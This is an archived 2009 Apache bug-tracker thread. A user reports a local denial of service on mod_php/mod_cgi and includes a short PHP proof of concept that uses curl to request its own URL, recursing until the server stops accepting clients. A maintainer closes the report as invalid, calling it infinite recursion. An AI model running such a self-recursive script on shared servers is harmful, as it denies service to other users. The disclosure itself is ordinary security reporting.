You are viewing a plain text version of this content. The canonical link for it is here.
Posted to bugs@httpd.apache.org by bu...@apache.org on 2009/07/15 18:50:43 UTC
DO NOT REPLY [Bug 47536] New: Apacze local DOS/mod_php/mod_cgi
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536
Summary: Apacze local DOS/mod_php/mod_cgi
Product: Apache httpd-2
Version: 2.2.11
Platform: PC
OS/Version: Linux
Status: NEW
Severity: normal
Priority: P2
Component: mod_cgi
AssignedTo: bugs@httpd.apache.org
ReportedBy: iforone@spof.pl
Hello,
I've found a bug in apache* server which makes local DOS attack possible.
The attack consists in executnig a code (php** for example) which executes
itself and server stops acceptig new clients.
Vulnerable to attack are mod_php and mod_cgi.
It would appear that php made by mod_fastcgi is resistant (the server doeas not
accpeting new requests for socket which we're attacking but the
rest works stable - in the situation when every site has its own socket,
someone who attacks can turn off 'his own' site only.)
The attack is not fine but no limits (process/memory/procesor time limit) can
block it.
I menaged to lead to the situation when 1 php process was blocking the server.
Software:
- HTTPD:
* apache-2.2.11
* apache-2.2.9
- OS:
* gentoo (linux-2.6.29/linux-2.6.27)
* freebsd (7.0)
- PHP:
* 5.2.10 (+suhosin)
* 5.2.9
POC:
-----------------------------------------------------------------
<?php
$url = $_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
echo $url;
if (!function_exists('curl_init'))
die("no curl");
$handle = curl_init("http://$url");
curl_setopt($handle, CURLOPT_USERAGENT, "www_agent");
curl_exec($handle);
curl_close($handle);
?>
-----------------------------------------------------------------
* It's hard for me to estimate if the possibility to carring out the attack is
caused by 'weakness' of the server or php - if you think
that it's not the server's fault, please contack me.
** The attack was carried out with the aid of php, but I think that any code
(used as cgi) can DOS httpd.
If you need any additional information or think that isn't bug, please contack
me.
Yours sincerely,
Bartosz /zynzel/ Kupidura
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
DO NOT REPLY [Bug 47536] Apache local DOS/mod_php/mod_cgi
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536
Dan Poirier <po...@pobox.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |RESOLVED
Resolution| |INVALID
--- Comment #1 from Dan Poirier <po...@pobox.com> 2009-09-23 10:09:18 PDT ---
It's not really an Apache bug if somebody writes a PHP script with infinite
recursion. The solution is not to do that.
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
DO NOT REPLY [Bug 47536] Apache local DOS/mod_php/mod_cgi
Posted by bu...@apache.org.
https://issues.apache.org/bugzilla/show_bug.cgi?id=47536
iforone@spof.pl changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|Apacze local |Apache local
|DOS/mod_php/mod_cgi |DOS/mod_php/mod_cgi
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org